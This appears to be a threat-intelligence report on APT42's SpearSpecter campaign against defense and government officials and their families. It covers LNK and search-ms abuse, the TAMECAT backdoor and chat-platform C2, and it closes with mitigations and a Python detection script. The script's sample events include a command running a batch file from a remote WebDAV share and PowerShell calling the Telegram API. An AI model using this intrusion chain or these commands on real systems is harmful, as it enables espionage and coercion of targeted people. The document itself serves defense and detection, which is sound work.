Full Report
The Iranian state-sponsored threat actor known as APT42 has been observed targeting individuals and organizations that are of interest to the Islamic Revolutionary Guard Corps (IRGC) as part of a new espionage-focused campaign. The activity, detected in early September 2025 and assessed to be ongoing, has been codenamed SpearSpecter by the Israel National Digital Agency (INDA). "The
Analysis Summary
# Threat Actor: APT42
## Attribution & Identity
**Attribution:** Iranian state-sponsored threat actor.
**Known Aliases & Associated Groups:** APT42 overlaps with the IRGC threat cluster tracked as APT35, CALANQUE, Charming Kitten, CharmingCypress, Cobalt Illusion, Educated Manticore, GreenCharlie, ITG18, Magic Hound, Mint Sandstorm (formerly Phosphorus), TA453, and Yellow Garuda.
**Internal Sub-groups:** SpearSpecter activity is attributed to Cluster D of APT42 (focusing on malware-based operations), distinct from Cluster B (which focuses on credential harvesting).
## Activity Summary
APT42 is conducting a new, ongoing espionage-focused campaign codenamed **SpearSpecter**, detected in early September 2025 by the Israel National Digital Agency (INDA). The campaign systematically targets high-value senior defense and government officials. A notable feature is the extension of targeting to the primary targets' family members to exert broader pressure. INDA noted that two different sub-groups within APT42 conducted the SpearSpecter campaign and a separate credential-harvesting campaign detailed in June 2025.
## Tactics, Techniques & Procedures
- **Social Engineering:** Mounting convincing social engineering campaigns that can run for days or weeks to build trust, sometimes masquerading as known contacts.
- **Impersonation:** Posing as high-value contacts (or, in related campaigns, technology executives/researchers).
- **Pretexting:** Inviting targets to prestigious conferences or arranging significant meetings to initiate contact.
- **Credential Harvesting:** Redirecting victims to bogus meeting pages designed to capture credentials.
- **Malicious Document Delivery (LNK Abuse):** Impersonating trusted WhatsApp contacts to send malicious links disguised as required meeting documents. The link leads through a redirect chain to a WebDAV-hosted Windows shortcut (`.LNK` file) masquerading as a PDF, which abuses the `search-ms:` protocol handler.
- **Malware Deployment:** Deploying the PowerShell backdoor known as **TAMECAT** for persistent access.
- **Loader Usage:** The LNK file retrieves a batch script that functions as a loader for TAMECAT.
- **Modular Backdoor:** TAMECAT uses various modular components for data exfiltration and remote control.
- **Multi-Channel C2:** Utilizing three distinct channels for Command-and-Control: HTTPS, Discord, and Telegram (via an attacker-controlled Telegram bot).
## Targeting
- **Sectors:** Defense and Government.
- **Geography:** Not explicitly stated, but operations are being tracked by INDA (Israel).
- **Victims:** High-value senior defense and government officials, and by extension, their family members.
## Tools & Infrastructure
- **Malware Families Used:** TAMECAT (PowerShell backdoor).
- **Infrastructure (C2, domains, IPs):**
  - WebDAV hosting for LNK files.
  - Cloudflare Workers subdomain used to retrieve the batch script loader.
  - C2 channels: HTTPS, Discord, and Telegram bots.
## Implications
APT42/Cluster D is demonstrating a persistent, high-effort espionage campaign focused on senior defense and government figures, likely supporting the intelligence requirements of the IRGC. The group's ability to leverage family members increases coercion potential. The use of multi-channel C2 (Discord/Telegram) suggests a strong effort to maintain long-term persistence even if traditional C2 channels are disrupted.
## Mitigations
- Heightened vigilance regarding unsolicited invitations or meeting requests, especially those related to high-profile conferences or requiring document review.
- Organizations should implement strict controls around protocol handlers like `search-ms:` to prevent unintended execution paths.
- Review and segment access controls for high-value personnel, acknowledging that family members may serve as an extended attack surface.
- Monitor network traffic for C2 communication patterns associated with known PowerShell backdoors utilizing Discord or Telegram channels.
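As an added illustration of the detection side of these mitigations (not code from the report or from INDA), the following Python triage runs three checks over constructed process-creation events shaped like the chain described under Tactics, Techniques & Procedures: a `search-ms:` URI whose location crumb points off-host, a batch script launched directly from a WebDAV/UNC path, and PowerShell talking to the public Telegram or Discord API hosts. The event field names, the IP address and the file names are assumptions made for the sample; the API host names are well-known public endpoints, not indicators from the report.

```python
import re

# Constructed sample process-creation events mirroring the reported chain
# (search-ms LNK -> WebDAV batch loader -> PowerShell C2). Not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": r'explorer.exe "search-ms:query=agenda.pdf&crumb=location:\\203.0.113.10@80\DavWWWRoot\docs"'},
    {"pid": 2, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c \\203.0.113.10@80\DavWWWRoot\docs\setup.bat"},
    {"pid": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c <omitted>", "dest_host": "api.telegram.org"},
    {"pid": 4, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt", "dest_host": "example.com"},
]

# A search-ms: URI is benign when it searches local folders; a location crumb
# that is a UNC path or URL means Explorer will pull results from a remote host.
SEARCH_MS_REMOTE = re.compile(r"search-ms:.*location:(\\\\|https?://)", re.I)
# .bat/.cmd executed straight from a UNC path; the host@port\DavWWWRoot form is
# how the Windows WebDAV redirector exposes an HTTP share.
WEBDAV_SCRIPT = re.compile(r"\\\\[^\s\\]+\\[^\s]*\.(bat|cmd)\b", re.I)
# Public chat-platform API hosts (assumed watch-list, not IoCs from the report).
CHAT_C2_HOSTS = {"api.telegram.org", "discord.com", "discordapp.com"}

def triage(events):
    """Return (rule, pid) pairs; each rule maps to one stage of the reported chain."""
    hits = []
    for ev in events:
        cmd = ev.get("cmdline", "")
        image = ev.get("image", "").lower()
        if SEARCH_MS_REMOTE.search(cmd):
            hits.append(("search-ms-remote-location", ev["pid"]))
        if WEBDAV_SCRIPT.search(cmd):
            hits.append(("script-from-unc-webdav", ev["pid"]))
        if image.endswith("powershell.exe") and ev.get("dest_host", "").lower() in CHAT_C2_HOSTS:
            hits.append(("powershell-to-chat-api", ev["pid"]))
    return hits

if __name__ == "__main__":
    for rule, pid in triage(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Any single hit deserves a look; all three on one host within minutes is the pattern to page on, since the benign uses of each (local search URIs, intranet batch shares, chat integrations) rarely co-occur.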